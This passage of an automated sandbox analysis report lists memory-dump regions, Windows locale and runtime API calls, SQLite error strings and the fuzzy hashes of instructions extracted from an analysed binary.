                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: EXCEPT$GROUP$INTERSECT$ORDER$SELECTs to the left and right of %s do not have the same number of result columns$UNION$UNION ALL$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause$all VALUES must have the same number of terms
                                                                                    • API String ID: 0-2775031899
                                                                                    • Opcode ID: 7068523f17a4f9b748fc3d77f4e099f57a4735f4839b465ea7f1117345ca7f45
                                                                                    • Instruction ID: db49a19483ecf2bb48e22cbf16788b50a0b89a877fd53b10fb4950178e512ddc
                                                                                    • Opcode Fuzzy Hash: 7068523f17a4f9b748fc3d77f4e099f57a4735f4839b465ea7f1117345ca7f45
                                                                                    • Instruction Fuzzy Hash: B9E179706047018FC718CF29D481A2AFBE1FF99704F154AADEA859B351E770EE46DB82
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: %s.%s$%s.%s.%s$'%s' is not a function$Expression tree is too large (maximum depth %d)$no such table: %s$no tables specified$subquery_%p$too many columns in result set$too many references to "%s": max 65535
                                                                                    • API String ID: 0-1692665679
                                                                                    • Opcode ID: 9c71b38056e1ff3212983a246f5b9ee803295304e12239b4736e2c386b01ca26
                                                                                    • Instruction ID: 889104b7b95e4ab831ba390cf2ec2382d7964546439367d5ed1fac9d1ca63c99
                                                                                    • Opcode Fuzzy Hash: 9c71b38056e1ff3212983a246f5b9ee803295304e12239b4736e2c386b01ca26
                                                                                    • Instruction Fuzzy Hash: 2F62B3716063019FCB14DF2CC480A6AB7E9FF89714F1849ADE8999B361D731EC46CB91
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_extension_init$te3_$unable to open shared library [%s]
                                                                                    • API String ID: 0-842236153
                                                                                    • Opcode ID: 3406854a5a9d7ffb64e261b5a747a92489e338f6b734096d699da3c819a4840e
                                                                                    • Instruction ID: 0c4a88f87c5103fbd0bece85b6c0d1685a50db9fd0ac3ebf896ebf6afcc69918
                                                                                    • Opcode Fuzzy Hash: 3406854a5a9d7ffb64e261b5a747a92489e338f6b734096d699da3c819a4840e
                                                                                    • Instruction Fuzzy Hash: 7502F3B56043018FD714CF6CE88176AB7E8FF89314F048AA8F8AD97251E735D945CBA2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ,$-$BINARY$E$Expression tree is too large (maximum depth %d)$F$NOCASE$ON clause references tables to its right
                                                                                    • API String ID: 0-653960482
                                                                                    • Opcode ID: 1de0ef598aa950bc20d807a02b9b7d42dd21c3fa71719d066ec671b96078aaac
                                                                                    • Instruction ID: 791a38a54adb79353e7c669b85791630b6a688348784d0437d430810e181a392
                                                                                    • Opcode Fuzzy Hash: 1de0ef598aa950bc20d807a02b9b7d42dd21c3fa71719d066ec671b96078aaac
                                                                                    • Instruction Fuzzy Hash: EAB27274A083419FDB14CF28C490A2ABBF1FF89314F1489ADE9998B352D771ED45CB92
                                                                                    APIs
                                                                                      • Part of subcall function 00C0D281: GetLastError.KERNEL32(00000000,00000000,00000000,00C0B710,?,?,00C12E05,?,00000000,00000040,00000000,00000000,00000040,?,00000000,00000080), ref: 00C0D286
                                                                                      • Part of subcall function 00C0D281: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00C12E05,?,00000000,00000040,00000000,00000000,00000040,?,00000000,00000080,00000000), ref: 00C0D324
                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,00C0A394,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00C168C4
                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00C0A394,?,?,?,00000055,?,-00000050,?,?), ref: 00C168EF
                                                                                    • _wcschr.LIBVCRUNTIME ref: 00C16983
                                                                                    • _wcschr.LIBVCRUNTIME ref: 00C16991
                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00C16A52
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                    • String ID: utf8
                                                                                    • API String ID: 4147378913-905460609
                                                                                    • Opcode ID: 2f6397e5656278fac3245c1be9c72a21551f0ddf79ac8c2b3f0d8dab3a6392c0
                                                                                    • Instruction ID: 698a47ed320fd148470b3fed5235a5bf9e1caacf2df85a0dc0b1ab4da111c19b
                                                                                    • Opcode Fuzzy Hash: 2f6397e5656278fac3245c1be9c72a21551f0ddf79ac8c2b3f0d8dab3a6392c0
                                                                                    • Instruction Fuzzy Hash: 8971E372A00302ABEB24AB75CC42BFA77A8EF46710F144469F915D71C1EB74EAC1B760
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: __floor_pentium4
                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                    • API String ID: 4168288129-2761157908
                                                                                    • Opcode ID: 8aed0dbb0821688aff46e1c5b36d417a61d4b4d0e38ec50514f2d8c46edcf6f9
                                                                                    • Instruction ID: 07ce0fd3b2c12bb68efb5f5e74877dde16b69d9bbf4c8c8da75d3f77f498b208
                                                                                    • Opcode Fuzzy Hash: 8aed0dbb0821688aff46e1c5b36d417a61d4b4d0e38ec50514f2d8c46edcf6f9
                                                                                    • Instruction Fuzzy Hash: E0D23971E092288FDB65CE28DD407EAB7B5EB4A304F1445EAD41DE7240E778AEC19F41
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"
                                                                                    • API String ID: 0-594550510
                                                                                    • Opcode ID: be0f5f0b4c3d57bb66d97d5786826766964d0913f01e7066177022c66f9547fb
                                                                                    • Instruction ID: e9787e1fabb1f7e712059e7cda1cefb5c9e6ac8e95b1534bfe31ec9081730322
                                                                                    • Opcode Fuzzy Hash: be0f5f0b4c3d57bb66d97d5786826766964d0913f01e7066177022c66f9547fb
                                                                                    • Instruction Fuzzy Hash: 6A326C74A04B419FCB24CF28C480B6AB7E2FF88314F5545ADE8899B356D730EE45DB92
                                                                                    APIs
                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,00C172AD,00000002,00000000,?,?,?,00C172AD,?,00000000), ref: 00C17028
                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,00C172AD,00000002,00000000,?,?,?,00C172AD,?,00000000), ref: 00C17051
                                                                                    • GetACP.KERNEL32(?,?,00C172AD,?,00000000), ref: 00C17066
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InfoLocale
                                                                                    • String ID: ACP$OCP
                                                                                    • API String ID: 2299586839-711371036
                                                                                    • Opcode ID: 7c65d5b7699f9e238bca4775dc8bbeacfcfd43749e1ed6589b8ed1f9afa308f1
                                                                                    • Instruction ID: f96bfacaee9cc0537faf60b90663fd4e3f013015b20518508598186857c187cb
                                                                                    • Opcode Fuzzy Hash: 7c65d5b7699f9e238bca4775dc8bbeacfcfd43749e1ed6589b8ed1f9afa308f1
                                                                                    • Instruction Fuzzy Hash: E421D662A04201EBDB34CF54C900BD773B6AB5AF60B168664F81AD7200E732EFC2E350
                                                                                    Strings
                                                                                    • out of memory, xrefs: 00B59099
                                                                                    • attached databases must use the same text encoding as main database, xrefs: 00B58E0F
                                                                                    • unable to open database: %s, xrefs: 00B59018
                                                                                    • too many attached databases - max %d, xrefs: 00B58B9A
                                                                                    • database %s is already in use, xrefs: 00B58C62
                                                                                    • database is already attached, xrefs: 00B58DBA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: attached databases must use the same text encoding as main database$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                    • API String ID: 0-2224017942
                                                                                    • Opcode ID: a8da791e0d9ddaa5595cd8878ba49b923321e08778715231bf9b7825513a4100
                                                                                    • Instruction ID: 3ebcd292f34451b1395594113c4f0d9c7eddac9f79f82724435bd18b9b576df4
                                                                                    • Opcode Fuzzy Hash: a8da791e0d9ddaa5595cd8878ba49b923321e08778715231bf9b7825513a4100
                                                                                    • Instruction Fuzzy Hash: CD1204706047419FDB25DF24C48176AB7E2FF85305F184ADDEC996B282DB31E849CB91
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: %s at line %d of [%.10s]$-wal$1a584e499906b5c87ec7d43d4abce641fdf017c42125b083109bc77c4de48827$cannot open file$immutable$nolock
                                                                                    • API String ID: 0-3103482366
                                                                                    • Opcode ID: 5350fcc843337753726495e2095b6accc60ccc51dd5e3bb73a78b9bb445795fa
                                                                                    • Instruction ID: 7e7a015d3fe274542cdde8e7c05c7ba7b905b9b98f9c1bddb19451853f868f8d
                                                                                    • Opcode Fuzzy Hash: 5350fcc843337753726495e2095b6accc60ccc51dd5e3bb73a78b9bb445795fa
                                                                                    • Instruction Fuzzy Hash: 87022671A007059FDB14CF68D841BAEBBF1EF45314F1485ACE86DAB382D736A906CB90
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 00C12B1D
                                                                                    • _free.LIBCMT ref: 00C12CE9
                                                                                    • _free.LIBCMT ref: 00C12D61
                                                                                    • GetTimeZoneInformation.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,00C12F22,?,?,00000000), ref: 00C12D73
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _free$InformationTimeZone
                                                                                    • String ID:
                                                                                    • API String ID: 597776487-0
                                                                                    • Opcode ID: 9b7916cad07b877c9d27c617d5f86104f105476189079959738a3bc235a441f9
                                                                                    • Instruction ID: 39700b2bb088a9b46f12b9524287d9c7d1eb9331357f5bb07c34b6ddced2cc52
                                                                                    • Opcode Fuzzy Hash: 9b7916cad07b877c9d27c617d5f86104f105476189079959738a3bc235a441f9
                                                                                    • Instruction Fuzzy Hash: 96A12679900215AFDB20AF64DC82BEE7BB9EF06710F144069F915E7191EB309E91FB90
                                                                                    APIs
                                                                                      • Part of subcall function 00C0D281: GetLastError.KERNEL32(00000000,00000000,00000000,00C0B710,?,?,00C12E05,?,00000000,00000040,00000000,00000000,00000040,?,00000000,00000080), ref: 00C0D286
                                                                                      • Part of subcall function 00C0D281: SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00C12E05,?,00000000,00000040,00000000,00000000,00000040,?,00000000,00000080,00000000), ref: 00C0D324
                                                                                      • Part of subcall function 00C0D281: _free.LIBCMT ref: 00C0D2E3
                                                                                      • Part of subcall function 00C0D281: _free.LIBCMT ref: 00C0D319
                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00C17270
                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 00C172B9
                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 00C172C8
                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00C17310
                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00C1732F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                                                    • String ID:
                                                                                    • API String ID: 949163717-0
                                                                                    • Opcode ID: f1ad0b496a624eb1c524e74f08a07a96aed73e40b57ea834ebf4758005027c78
                                                                                    • Instruction ID: 3189f9ae9f9c64a1ee97e7b4d2e3707f8125e6e4d09ea121e438ca10deb29c1f
                                                                                    • Opcode Fuzzy Hash: f1ad0b496a624eb1c524e74f08a07a96aed73e40b57ea834ebf4758005027c78
                                                                                    • Instruction Fuzzy Hash: 99517D71A04209EFDF20DFA5CC45BEE77B8BF06700F144269F911E7190E7709A86AB61
                                                                                    APIs
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B228A9
                                                                                      • Part of subcall function 00B22220: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B22305
                                                                                    Strings
                                                                                    • cannot open file, xrefs: 00B225DE
                                                                                    • %s at line %d of [%.10s], xrefs: 00B225E3
                                                                                    • 1a584e499906b5c87ec7d43d4abce641fdf017c42125b083109bc77c4de48827, xrefs: 00B225D4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.1728101749.0000000000B11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00B10000, based on PE: true
                                                                                    • Associated: 00000004.00000002.1728076728.0000000000B10000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728215878.0000000000C2A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C56000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728252638.0000000000C5B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000C5F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728295672.0000000000CA2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728350598.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.1728364917.0000000000CCF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_b10000_65BD7E49FE292748F0C504DCBEFDB0AD86E69C8349D7253D0E95EBF1BF0110B0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                    • String ID: %s at line %d of [%.10s]$1a584e499906b5c87ec7d43d4abce641fdf017c42125b083109bc77c4de48827$cannot open file
                                                                                    • API String ID: 885266447-3209268730
                                                                                    • Opcode ID: db60689ff9ecff68ef8e4b0a676ec21fd0898f62ca4d0aaab1433d7602034d37
                                                                                    • Instruction ID: ca25630a0073cca28aee5e01bf680b24718795b0e0ba24e65bed5190076a7c45
